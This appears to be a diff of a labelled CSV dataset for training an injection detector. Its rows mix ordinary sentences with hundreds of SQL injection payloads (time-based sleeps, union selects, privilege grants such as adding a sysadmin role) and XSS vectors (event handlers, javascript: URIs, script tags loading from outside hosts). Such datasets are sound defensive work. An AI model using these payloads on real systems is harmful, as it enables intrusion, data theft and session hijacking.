7745,7745,7745,7745,77",2,SQLi,14950 +"-6746"" ) or ( 8459 = 8459 ) *4906 and ( ""kohi"" lik",2,SQLi,14296 +I want to select a movie for tonight.,0,normal,23802 +Aggregate data where possible.,0,normal,23446 +Choose from select frying skillets and casserole d,0,normal,26287 +<image onpointerleave=alert(1)>XSS</image>,1,XSS,8834 +"I mean, I'm sure there's a select few that do.",0,normal,26069 +-6813 ) ) ) or 6872 = 6872 and ( ( ( 7304 = 7304,2,SQLi,16708 +"<rb oncut=""alert(1)"" contenteditable>test</rb>",1,XSS,5720 +1%' rlike sleep ( 5 ) and '%' = ',2,SQLi,19941 +"<del onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,2031 +1 where 9393 = 9393 waitfor delay '0:0:5'--,2,SQLi,21961 "{""id"":null,""firstName"":""Frankie"",""lastName"":""Lim B",0,normal,27395 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2058 -"))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='133",2,SQLi,11249 -1 where 6304 = 6304,2,SQLi,19525 -"-7601"" ) ) ) union all select 1293,1293,1293,1293,",2,SQLi,13776 -"{""id"":null,""firstName"":""Penny"",""lastName"":""Tan"",""s",0,normal,27058 -"1"" ) as yekp where 3049 = 3049 and char ( 111 ) ||",2,SQLi,12430 -<thead onpointerout=alert(1)>XSS</thead>,1,XSS,3995 -<font onpointerdown=alert(1)>XSS</font>,1,XSS,7563 -"{""id"":null,""firstName"":""Gab"",""lastName"":""Tan"",""add",0,normal,26978 -"1"" where 3990 = 3990 and 8594 = ( select 8594 from",2,SQLi,16353 -"-5052 ) ) ) union all select 8351,8351,8351,8351#",2,SQLi,12916 -"{""id"":null,""firstName"":""Sam"",""lastName"":""Tan"",""add",0,normal,27213 -Select mature.,0,normal,24773 -1'+ ( select 'ovti' where 4243 = 4243 and 6537 = d,2,SQLi,16181 +"<footer onmouseenter=""alert(1)"">test</footer>",1,XSS,2059 +") AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '13",2,SQLi,11251 +1'+ ( select 'vabj' where 7178 = 7178 union all se,2,SQLi,18334 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,13778 +"{""id"":null,""name"":""American Alsatian""}",0,normal,27055 +"1"" ) rlike ( select * from ( select ( sleep ( 5 ) ",2,SQLi,12432 +"<style>@keyframes x{}</style><ul style=""animation-",1,XSS,3997 +<tt onfocusout=alert(1) tabindex=1 id=x></tt><inpu,1,XSS,7565 +"{""id"":null,""name"":""Noctowl""}",0,normal,26975 +1' in boolean mode ) and 6240 = ( 'qqpjq'|| ( sele,2,SQLi,16344 +"1"" ) as gdcx where 2335 = 2335 and 6969 = ( select",2,SQLi,12918 +"{""id"":null,""firstName"":""Nazierul Haqeem"",""lastName",0,normal,27211 +Select sell.,0,normal,24770 +These will act in a similar way to departmental se,0,normal,25320 "<a href=""\x11javascript:javascript:alert(1)"" id=""f",1,XSS,495 -"1' ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( 'tmb",2,SQLi,18573 -"<style>@keyframes slidein {}</style><ol style=""ani",1,XSS,2817 -<style>:target {color:red;}</style><section id=x s,1,XSS,8939 -I want to select a book for my book club.,0,normal,23973 -1 ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117,2,SQLi,18838 -1'|| ( select 'jzwq' where 3289 = 3289 union all s,2,SQLi,20035 -"1 ) and make_set ( 1559 = 4863,4863 )",2,SQLi,18615 -<img id=x tabindex=1 ondeactivate=alert(1)></img><,1,XSS,4099 -"-4330' union all select 3059,3059,3059,3059,3059,3",2,SQLi,21604 -Select your dream destination.,0,normal,24281 -"<multicol draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,7502 -"1' ) where 7658 = 7658 union all select null,null#",2,SQLi,14863 -<button onPopState=javascript:alert(1)>,1,XSS,9647 -1%' ) and ( select 2* ( if ( ( select * from ( sel,2,SQLi,17099 -"{""id"":null,""firstName"":""Angelina"",""lastName"":""Tan""",0,normal,27251 -Aggregate data where useful.,0,normal,23251 -"<link draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,2289 -"{""id"":null,""firstName"":""Lotus"",""lastName"":""Li"",""sp",0,normal,27029 -Where's your SQL handbook?,0,normal,23404 -&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.,1,XSS,1409 -1 and 8514 = ( select count ( * ) from domain.doma,2,SQLi,12163 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,21100 +1' and ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,18571 +"<thead draggable=""true"" ondrag=""alert(1)"">test</th",1,XSS,2818 +"<frameset onmouseleave=""alert(1)"">test</frameset>",1,XSS,8941 +Let's discuss where to go for our next adventure.,0,normal,23970 +Reports to the Postmaster-General upon proposals f,0,normal,25752 +1' ) ) as bswc where 1635 = 1635 and 7756 = dbms_u,2,SQLi,20033 +"1' ) ) and elt ( 4460 = 2665,2665 ) and ( ( 'qmzu'",2,SQLi,19655 +<style>@keyframes slidein {}</style><figure style=,1,XSS,4101 +"1%"" ) ) and 9254 = ( select count ( * ) from rdb$f",2,SQLi,21602 +"{""id"":null,""name"":""Articuno""}",0,normal,26774 +"<!--#exec cmd=""/bin/echo 'IPT SRC=http://.rocks/.j",1,XSS,7504 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,14856 +<button onPropertyChange=javascript:alert(1)>,1,XSS,9649 +"To do a search, select an item and click Paste to ",0,normal,25275 +"{""id"":null,""name"":""continent""}",0,normal,27249 +"{""id"":null,""name"":""start behind""}",0,normal,26747 +"<output onmouseout=""alert(1)"">test</output>",1,XSS,2290 +Up to 50% off select Lifesmart Hot Tubs and Massag,0,normal,25203 +Start the Spotify app and select a song to play.,0,normal,25523 +&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot,1,XSS,1410 +"iif ( 7889 = 5114,1,1/0 )",2,SQLi,12165 +1 where 9279 = 9279 or 7427 = dbms_pipe.receive_me,2,SQLi,21098 "&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\""XSS\"");&lt;/SC",1,XSS,974 -1 RLIKE SLEEP(5),2,SQLi,11218 -"{""id"":null,""name"":""direct class""}",0,normal,27172 -<tfoot id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,8154 -"-9504%"" ) ) or 8098 = 7472",2,SQLi,18016 -"<rtc onpaste=""alert(1)"" contenteditable>test</rtc>",1,XSS,8205 -Where's the river?,0,normal,23516 -Order a pepperoni pie.,0,normal,22713 -1 ) where 9167 = 9167,2,SQLi,17886 -select * from users where id = 1 or \<\ union sele,2,SQLi,11769 -"To view the video clips, the site requires the use",0,normal,25248 +1 RLIKE SLEEP(5)# 1337,2,SQLi,11220 +"{""id"":null,""name"":""Totodile""}",0,normal,27170 +<listing onpointerout=alert(1)>XSS</listing>,1,XSS,8156 +1%' ) ) or 7552 = ( select count ( * ) from rdb$fi,2,SQLi,18014 +<html onpointerout=alert(1)>XSS</html>,1,XSS,8207 +Levi's: Save up to 30% on select styles until Nove,0,normal,25909 1 or 8421 = ( select count ( * ) from generate_ser,2,SQLi,22166 -"-9111"" or 3038 = 3038",2,SQLi,20295 --7746' ) ) ) or 4144 = ( select upper ( xmltype ( ,2,SQLi,16241 -<a onpointerdown=alert(1)>XSS</a>,1,XSS,3679 -<time id=x tabindex=1 onfocus=alert(1)></time>,1,XSS,5682 -1%' ) ) or 9643 = ( select count ( * ) from domain,2,SQLi,13716 -"-3979' in boolean mode ) union all select 4911,491",2,SQLi,18243 -<dfn id=x tabindex=1 onfocusin=alert(1)></dfn>,1,XSS,7963 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10654 -"1%"" or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c",2,SQLi,21807 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7855 -Select inspire.,0,normal,24732 -&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&qu,1,XSS,1400 -<marquee onpointerover=alert(1)>XSS</marquee>,1,XSS,8213 -Select aim.,0,normal,24665 -"1"" rlike sleep ( 5 )",2,SQLi,15732 +Where's the beauty salon?,0,normal,23641 +’ or ‘1’ = ’1,2,SQLi,11771 +"To select content, an ""Alexa, select [name of cont",0,normal,25245 +Where's the mountain?,0,normal,23518 +"-9886%' ) ) ) union all select 5191,5191,5191,5191",2,SQLi,20293 +"1"" where 7879 = 7879",2,SQLi,20528 +"<map onmouseup=""alert(1)"">test</map>",1,XSS,3681 +<template onpointerup=alert(1)>XSS</template>,1,XSS,5684 +-2648' ) or 4747 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,13718 +1' ) ) ) rlike ( select * from ( select ( sleep ( ,2,SQLi,18241 +<ol onfocusout=alert(1) tabindex=1 id=x></ol><inpu,1,XSS,7965 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10656 +1 where 5266 = 5266 and exp ( ~ ( select * from ( ,2,SQLi,21805 +"<canvas onclick=""alert(1)"">test</canvas>",1,XSS,7857 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,18156 +a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot,1,XSS,1401 +"<audio ondblclick=""alert(1)"">test</audio>",1,XSS,8215 +1%' or 9643 = ( select count ( * ) from domain.dom,2,SQLi,16897 +Join us for lunch.,0,normal,22764 "<a href=""\x13javascript:javascript:alert(1)"" id=""f",1,XSS,507 -"1' and elt ( 1210 = 1210,sleep ( 5 ) ) and 'pjrf' ",2,SQLi,21161 +1%' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash,2,SQLi,21159 /><img/onerror=\x09javascript:alert(1)\x09src=xxx:,1,XSS,595 -<em onpointermove=alert(1)>XSS</em>,1,XSS,4550 -"1"" ) ) as gbxx where 2459 = 2459 waitfor delay '0:",2,SQLi,21210 -admin' ) or ( '1' = '1'--,2,SQLi,11734 -"exec sp_addsrvrolemember 'name' , 'sysadmin' --",2,SQLi,10044 -"{""id"":null,""name"":""Totodile""}",0,normal,27170 -"1' where 7104 = 7104 union all select null,null,nu",2,SQLi,12332 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8109 -<img srcset=validimage.png onload=alert(1)>,1,XSS,2474 -<style>:target {color: red;}</style><noframes id=x,1,XSS,6350 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4593 -"{""id"":null,""name"":""African Bush Elephant""}",0,normal,27585 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20910 -"<video draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,1923 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4552 +Update your wardrobe style.,0,normal,22994 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11736 +grant connect to name; grant resource to name; --,2,SQLi,10046 +"{""id"":null,""name"":""grow""}",0,normal,27168 +"1"" ) ) or exp ( ~ ( select * from ( select concat ",2,SQLi,12334 +<code id=x tabindex=1 onfocus=alert(1)></code>,1,XSS,8111 +"<tfoot draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,2475 +<dl onpointerup=alert(1)>XSS</dl>,1,XSS,6352 +"<style>@keyframes x{}</style><label style=""animati",1,XSS,4595 +1' ) ) ) or 4915 = ( select count ( * ) from domai,2,SQLi,15504 +1' ) as zmvn where 2887 = 2887 union all select nu,2,SQLi,20038 +<div onpointerleave=alert(1)>XSS</div>,1,XSS,1924 "{""id"":null,""firstName"":""Janet"",""lastName"":""Swar"",""",0,normal,27433 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11082 -1'+ ( select sfmz where 4870 = 4870 or char ( 75 ),2,SQLi,13385 -"-8976%"" ) ) ) union all select 5146,5146,5146,5146",2,SQLi,18399 -"union (select NULL, NULL, (select @@version)) --",2,SQLi,10050 -<button onSelectionChange=javascript:alert(1)>,1,XSS,9667 -<head onpointerenter=alert(1)>XSS</head>,1,XSS,7162 -"UNION ALL SELECT 1,2,3#",2,SQLi,10535 -"{""id"":null,""name"":""cry""}",0,normal,26823 -He got the House to set up a select committee to p,0,normal,26120 -"<style>@keyframes x{}</style><datalist style=""anim",1,XSS,7898 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8472 -<menuitem id=x tabindex=1 onfocus=alert(1)></menui,1,XSS,6261 -"<del onmousemove=""alert(1)"">test</del>",1,XSS,8143 -( select * from ( select ( sleep ( 5 ) ) ) acdk ) ,2,SQLi,18752 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,14000 -"<em onmouseleave=""alert(1)"">test</em>",1,XSS,4590 -"1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) |",2,SQLi,16367 -"{""id"":null,""firstName"":""Corinne"",""lastName"":""Chua""",0,normal,27097 -<q onpointerleave=alert(1)>XSS</q>,1,XSS,6197 --3211 ) ) as fsej where 6348 = 6348 or 9805 = 3783,2,SQLi,14480 -`'><script>\x0Ajavascript:alert(519)</script>,1,XSS,8967 -1' ) ) ) and 2542 = 7042--,2,SQLi,22348 -"{""id"":null,""name"":""excited bare sang""}",0,normal,27266 -"<center onkeydown=""alert(1)"" contenteditable>test<",1,XSS,4131 -"<main onmousemove=""alert(1)"">test</main>",1,XSS,6008 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,22381 -select * from users where id = 1 union select 1||1,2,SQLi,11413 -"<IMG SRC=x onabort=""alert(String.fromCharCode(88,8",1,XSS,1218 -select * from users where id = '1' or ( \ ) = 1 un,2,SQLi,12038 -"-3819' ) ) ) union all select 9014,9014,9014,9014,",2,SQLi,14231 -<style>:target {color:red;}</style><dir id=x style,1,XSS,6828 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11084 +"1"" where 9135 = 9135 and elt ( 4249 = 4249,7259 ) ",2,SQLi,13387 +"1, ( select ( case when ( 8640 = 8640 ) then ( asc",2,SQLi,15431 +"union (select NULL, NULL, NULL, NULL, (select @@ve",2,SQLi,10052 +<button onStop=javascript:alert(1)>,1,XSS,9669 +<fieldset onpointerout=alert(1)>XSS</fieldset>,1,XSS,7164 +"UNION ALL SELECT 1,2,3,4,5#",2,SQLi,10537 +"{""id"":null,""firstName"":""Kingsroad"",""lastName"":""Myx",0,normal,26820 +He is stopping in for a coffee at Café Select.,0,normal,26117 +"<bdo draggable=""true"" ondrag=""alert(1)"">test</bdo>",1,XSS,7900 +<keygen onpointerenter=alert(1)>XSS</keygen>,1,XSS,8474 +<s id=x tabindex=1 onfocus=alert(1)></s>,1,XSS,6263 +<frameset onpointerover=alert(1)>XSS</frameset>,1,XSS,8145 +"1"" and 8148 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,18750 +"-9179"" ) union all select 7144,7144,7144,7144,7144",2,SQLi,14002 +"<acronym draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,4592 +"-7981%"" union all select 4532,4532,4532,4532,4532,",2,SQLi,16358 +"iif ( 2205 = 4764,1,1/0 )",2,SQLi,17213 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6199 +"1%"" and 3202 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,14473 +`'><script>\x0Cjavascript:alert(515)</script>,1,XSS,8969 +"{""id"":null,""firstName"":""Eve"",""lastName"":""Ang"",""spe",0,normal,27163 +"1"" ) and ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,15233 +"<ul oncut=""alert(1)"" contenteditable>test</ul>",1,XSS,4133 +"<nobr onmouseout=""alert(1)"">test</nobr>",1,XSS,6010 +1' ) where 1917 = 1917 union all select null#,2,SQLi,22379 +select * from users where id = '1' or \.<\ or 1 = ,2,SQLi,11415 +"<IMG SRC=x oncanplay=""alert(String.fromCharCode(88",1,XSS,1219 +admin' or '1' = '1'/*,2,SQLi,12040 +"1' where 4149 = 4149 and 3202 = like ( 'abcdefg',u",2,SQLi,14233 +"<dd onmouseenter=""alert(1)"">test</dd>",1,XSS,6830 "<? foo=""><script>alert(1)</script>"">",1,XSS,962 -Let's choose a venue for the party.,0,normal,23958 -<math><brute href=javascript:alert(1)>click,1,XSS,9233 -"<kbd onmousedown=""alert(1)"">test</kbd>",1,XSS,2392 +Select the ideal book for your mood.,0,normal,24216 +<menu id=x contextmenu=x onshow=alert(1)>right cli,1,XSS,9235 +<code id=x tabindex=1 ondeactivate=alert(1)></code,1,XSS,2393 "<STYLE type=""text/css"">BODY{background:url(""<javas",1,XSS,280 -<abbr onpointermove=alert(1)>XSS</abbr>,1,XSS,1955 -"<abbr onmouseout=""alert(1)"">test</abbr>",1,XSS,6322 -"<var oncopy=""alert(1)"" contenteditable>test</var>",1,XSS,6056 -1 RLIKE SLEEP(5)-- 1337,2,SQLi,11219 -"1"" ) and 5556 = ( select count ( * ) from all_user",2,SQLi,19671 -<caption onpointerdown=alert(1)>XSS</caption>,1,XSS,1741 -Let's explore where the hiking trail leads.,0,normal,23744 -"{""id"":null,""firstName"":""Susan"",""lastName"":""Loh"",""s",0,normal,26808 -<pre onpointerout=alert(1)>XSS</pre>,1,XSS,6597 -"1%' ) union all select null,null--",2,SQLi,15938 -"<svg onmouseover=""alert(1)"">test</svg>",1,XSS,8650 -"-8838"" ) ) as xisn where 2749 = 2749 or 3440 = cas",2,SQLi,19843 -"|| myappadmin.adduser ( 'admin', 'newpass' ) || '",2,SQLi,11821 -"<var draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,5963 +<strong onfocusout=alert(1) tabindex=1 id=x></stro,1,XSS,1956 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6324 +"<small onmousedown=""alert(1)"">test</small>",1,XSS,6058 +) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11221 1' ) ) as tgso where 1349 = 1349 union all select ,2,SQLi,19669 -Please select a thumbnail to get a larger image.,0,normal,25775 -"""></title><script>alert(""XSS by \nxss"")</script>><",1,XSS,1346 +<caption id=x tabindex=1 ondeactivate=alert(1)></c,1,XSS,1742 +Where is this field used?,0,normal,23460 +"{""id"":14217,""firstName"":""jmeter"",""lastName"":""jmete",0,normal,26805 +"<BGSOUND SRC=""javascript:alert('');"">",1,XSS,6599 +-8357' ) ) as henk where 8198 = 8198 or 2558 = 910,2,SQLi,20606 +"<aside oncontextmenu=""alert(1)"">test</aside>",1,XSS,8652 +select ( case when ( 8978 = 1426 ) then 1 else 897,2,SQLi,14738 +select * from users where id = 1 + ( 1 ) union sel,2,SQLi,11823 +"<big onmouseup=""alert(1)"">test</big>",1,XSS,5965 +1' in boolean mode ) and 6510 = ( select count ( *,2,SQLi,19641 +Please select one of the items below or navigate v,0,normal,25772 +"<img """"""><script>alert(""XSS by \nxss"")</script><ma",1,XSS,1347 "<xss draggable=""true"" ondragleave=""alert(1)"" style",1,XSS,64 -"{""id"":null,""name"":""slide""}",0,normal,27096 -1' and 6537 = dbms_pipe.receive_message ( chr ( 76,2,SQLi,19332 -"-6940' ) union all select 3042,3042,3042,3042,3042",2,SQLi,12461 -1' ) as syer where 3141 = 3141 rlike ( select ( ca,2,SQLi,20379 -"-3037"" ) ) ) or elt ( 4758 = 9129,9129 ) and ( ( (",2,SQLi,16404 -"<em onmouseout=""alert(1)"">test</em>",1,XSS,3030 -1 ) as iuje where 1976 = 1976 and 6537 = dbms_pipe,2,SQLi,20714 -Select a hairstyle for the special occasion.,0,normal,24166 -&&SLEEP(5)&&'1,2,SQLi,10403 -"1 ) ) and 8148 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,19169 -The writer therefore questioned the Guardians ' ab,0,normal,25356 -1%' ) ) ) or 8315 = ( select count ( * ) from sysi,2,SQLi,20373 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3193 -select ( case when ( 4636 = 1108 ) then 1 else 463,2,SQLi,14972 -"1"" ) ) as aozi where 3354 = 3354 waitfor delay '0:",2,SQLi,14993 -&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&qu,1,XSS,1455 -"<command onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,2654 -"javascript:""/*'/*`/*\"" /*</title></style></textare",1,XSS,9493 -"select * from users where id = 1 or ""1]"" or 1 = 1 ",2,SQLi,11644 -"<details draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,2599 -1,0,normal,26653 -"<nextid oncopy=""alert(1)"" contenteditable>test</ne",1,XSS,8825 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1818 -"1 ) union all select null,null,null,null,null,null",2,SQLi,19273 -"1"" ) ) and 6510 = ( select count ( * ) from sysuse",2,SQLi,15145 -"<multicol onmousedown=""alert(1)"">test</multicol>",1,XSS,8254 --7843' where 5986 = 5986 or make_set ( 9354 = 9354,2,SQLi,21240 -"1%"" ) ) ) ( select ( case when ( 4587 = 4587 ) the",2,SQLi,19270 -<textarea onselect=alert(1) autofocus>XSS</textare,1,XSS,8098 -waitfor delay '0:0:5' and ( ( ( '%' = ',2,SQLi,13505 -<big id=x tabindex=1 onbeforeactivate=alert(1)></b,1,XSS,3099 -1' where 5023 = 5023 and 3580 = ( select count ( *,2,SQLi,19284 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3447 -1' where 1557 = 1557,2,SQLi,14069 --1730' or 8571 = 8571--,2,SQLi,16415 -"-8868"" ) where 5681 = 5681 union all select 5681,5",2,SQLi,13357 -<button onBeforePrint=javascript:alert(1)>,1,XSS,9585 -"1%' ) union all select null,null,null,null,null--",2,SQLi,22099 -Select sprint.,0,normal,24643 -"<i onclick=""alert(1)"">test</i>",1,XSS,6823 +"{""id"":null,""name"":""Mawile""}",0,normal,27094 +1' ) ) as vnwn where 8774 = 8774 and ( select * fr,2,SQLi,19088 +1 ) as qgsb where 7600 = 7600 and 2006 = 2006,2,SQLi,12463 +1%' ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99,2,SQLi,18889 +-9708' where 8150 = 8150 or 6872 = 6872--,2,SQLi,16402 +<body onblur=alert(1) id=x><iframe id=x>,1,XSS,3031 +"1' ) ) ) and row ( 6237,7469 ) > ( select count ( ",2,SQLi,14777 +"From there, you can select the product in question",0,normal,26154 +ORDER BY SLEEP(5)--,2,SQLi,10405 +concatenate,0,normal,23224 +Graduates of the most-select colleges often earn m,0,normal,26132 +1,0,normal,26729 +<acronym id=x tabindex=1 ondeactivate=alert(1)></a,1,XSS,3195 +1%' and 9127 = 7687--,2,SQLi,14965 +-7242' or 4144 = ( select upper ( xmltype ( chr ( ,2,SQLi,14986 +&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quo,1,XSS,1456 +"<style>@keyframes x{}</style><i style=""animation-n",1,XSS,2655 +"javascript:`//""//\""//</title></textarea></style></",1,XSS,9495 +or x = x,2,SQLi,11646 +<style>:target {color: red;}</style><noembed id=x ,1,XSS,2600 +Use these evaluation techniques to select the perf,0,normal,25196 +"<legend oncontextmenu=""alert(1)"">test</legend>",1,XSS,8827 +<main onfocusout=alert(1) tabindex=1 id=x></main><,1,XSS,1819 +"-5643' ) ) union all select 1515,1515#",2,SQLi,19271 +"1"" ) ) and 5421 = 4804--",2,SQLi,15137 +<noembed id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,8256 +1' ) and ( 3020 = 3020 ) *6703 and ( 'botl' like ',2,SQLi,21238 +Where did you find that cozy coffee shop?,0,normal,23977 +"<video draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,8100 +"1"" ) ) ) or 1022 = ( select count ( * ) from all_u",2,SQLi,13507 +"<aside onmouseleave=""alert(1)"">test</aside>",1,XSS,3100 +-3752%' union all select 9351--,2,SQLi,19282 +<sup onpointerleave=alert(1)>XSS</sup>,1,XSS,3449 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,14071 +1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||,2,SQLi,20554 +"1"" ) ) ) or 5356 = ( select count ( * ) from sysus",2,SQLi,13359 +<button onBeforeUpdate=javascript:alert(1)>,1,XSS,9587 +1 ) where 3381 = 3381 and 3754 = ( select upper ( ,2,SQLi,21431 +-7466 where 5161 = 5161 or 3038 = 3038,2,SQLi,21243 +<rb onpointerdown=alert(1)>XSS</rb>,1,XSS,6825 <li style=list-style:url() onerror=javascript:aler,1,XSS,634 -"-8771"" ) ) union all select 6302,6302,6302,6302,63",2,SQLi,15430 -%20$(sleep%2050),2,SQLi,10116 -<nextid id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,6962 --2402 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ),2,SQLi,14922 -"1"" ) where 8588 = 8588",2,SQLi,21178 -<img2 onpointerdown=alert(1)>XSS</img2>,1,XSS,7081 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3133 -"1"" ) and 5556 = ( select count ( * ) from all_user",2,SQLi,12263 -"{""id"":null,""name"":""Alligator""}",0,normal,27052 -"select * from users where id = 1 or 1#"" ( union se",2,SQLi,11894 -<shadow onpointerout=alert(1)>XSS</shadow>,1,XSS,2941 -Immediately afterward he was a member of a commiss,0,normal,26033 -"1"" ( select ( case when ( 4587 = 4587 ) then regex",2,SQLi,15051 -&lt;/BODY&gt;&lt;/HTML&gt;,1,XSS,1033 -1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR,2,SQLi,11340 -"-9039' ) union all select 8058,8058,8058,8058,8058",2,SQLi,12907 -"<summary ondblclick=""alert(1)"">test</summary>",1,XSS,2424 --7773' or 5903 = ( 'qqpjq'|| ( select case 5903 wh,2,SQLi,22317 -1'+ ( select shec where 3589 = 3589 and 6969 = ( s,2,SQLi,15562 -<span onpointerup=alert(1)>XSS</span>,1,XSS,6805 -"1"" ) where 2922 = 2922 or elt ( 6272 = 6272,sleep ",2,SQLi,20376 -select * from users where id = 1 *\. union select ,2,SQLi,11630 -Plant a shady tree.,0,normal,22572 -You can save up to 41% off select devices from Ama,0,normal,25090 -1 ) ) as zkrr where 4730 = 4730 or 8466 = benchmar,2,SQLi,22200 -Select the perfect accessory for your outfit.,0,normal,24181 -"1"" ) and ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,15233 -Select the ideal gift for a family member.,0,normal,24080 -"<img src=x onerror=\x11""javascript:alert(1)"">",1,XSS,680 -Select your proclaim.,0,normal,24958 -<figure id=x tabindex=1 onactivate=alert(1)></figu,1,XSS,4170 -Select your promise.,0,normal,24951 -"<plaintext draggable=""true"" ondragleave=""alert(1)""",1,XSS,8600 -"Again, some wardrobe hods mentioned that they trie",0,normal,26395 -They no longer select the chairmen of parliamentar,0,normal,25308 -select two people in the office.,0,normal,25574 -<small onpointerover=alert(1)>XSS</small>,1,XSS,4123 -><script+src=http://ads.pictela.net/a/proxy/shoplo,1,XSS,9816 -><script+src=https://count.tbcdn.cn//counter3?call,1,XSS,9788 -"-6942' ) union all select 7280,7280,7280#",2,SQLi,16585 -<input type=text value=“XSS”>,1,XSS,9746 -"<meter draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8141 -"<iframe srcdoc=""<img src=1 onerror=alert(1)>""></if",1,XSS,171 -select ( case when ( 4572 = 4086 ) then 1 else 457,2,SQLi,13097 -"<isindex onmouseup=""alert(1)"">test</isindex>",1,XSS,2883 -"<a onkeydown=""alert(1)"" contenteditable>test</a>",1,XSS,3206 -"1, ( select ( case when ( 5433 = 5433 ) then 1 els",2,SQLi,15400 -from,0,normal,26520 -Fetch records where required.,0,normal,23349 -"1 ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71",2,SQLi,19068 -1 or 8421 = ( select count ( * ) from generate_ser,2,SQLi,19145 +"1%"" union all select null,null,null--",2,SQLi,15422 +%20or%20''=',2,SQLi,10118 +"<bgsound onmouseover=""alert(1)"">test</bgsound>",1,XSS,6964 +1'|| ( select 'jscc' from dual where 3266 = 3266 a,2,SQLi,17641 +1 ) ) as rvex where 3462 = 3462 and 4595 = 4595#,2,SQLi,19304 +"<image onkeyup=""alert(1)"" contenteditable>test</im",1,XSS,7083 +<noembed onpointerleave=alert(1)>XSS</noembed>,1,XSS,3135 +-5918' ) as olzc where 5992 = 5992 or 4390 = 9085,2,SQLi,12265 +1' where 8635 = 8635 order by 1--,2,SQLi,18524 +select * from users where id = 1 +$+ union select ,2,SQLi,11896 +"<audio draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,2942 +In 1376 an ordinance was made by the mayor and ald,0,normal,26030 +-9212 or 1026 = 7967#,2,SQLi,15044 "&lt;SCRIPT SRC=\""http&#58;//ha&#46;ckers&#46;org/x",1,XSS,1034 -"1"" ) as kndn where 9314 = 9314",2,SQLi,13598 -1 ) ) as ynzg where 1926 = 1926 or ( select 9173 f,2,SQLi,14545 -"-8109%"" ) ) union all select 9089,9089--",2,SQLi,20195 -&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/s,1,XSS,1386 -"-4542 union all select 1249,1249,1249,1249,1249,12",2,SQLi,13974 -"<script language=""JavaScript"">alert('XSS')</script",1,XSS,1296 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8876 --2983' ) or 8571 = 8571--,2,SQLi,18970 -I want to select a gift for the special occasion.,0,normal,23979 -"<source draggable=""true"" ondrag=""alert(1)"">test</s",1,XSS,3127 -1' in boolean mode ) and 2716 = ( select count ( *,2,SQLi,22325 -"1%' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ",2,SQLi,20600 -1' ) and 4822 = 6997 and ( 'ojku' = 'ojku,2,SQLi,20322 -1' ) ) as vqrt where 5173 = 5173 and 3707 = ( sele,2,SQLi,17423 -"<sub onkeydown=""alert(1)"" contenteditable>test</su",1,XSS,7361 -<hgroup onblur=alert(1) tabindex=1 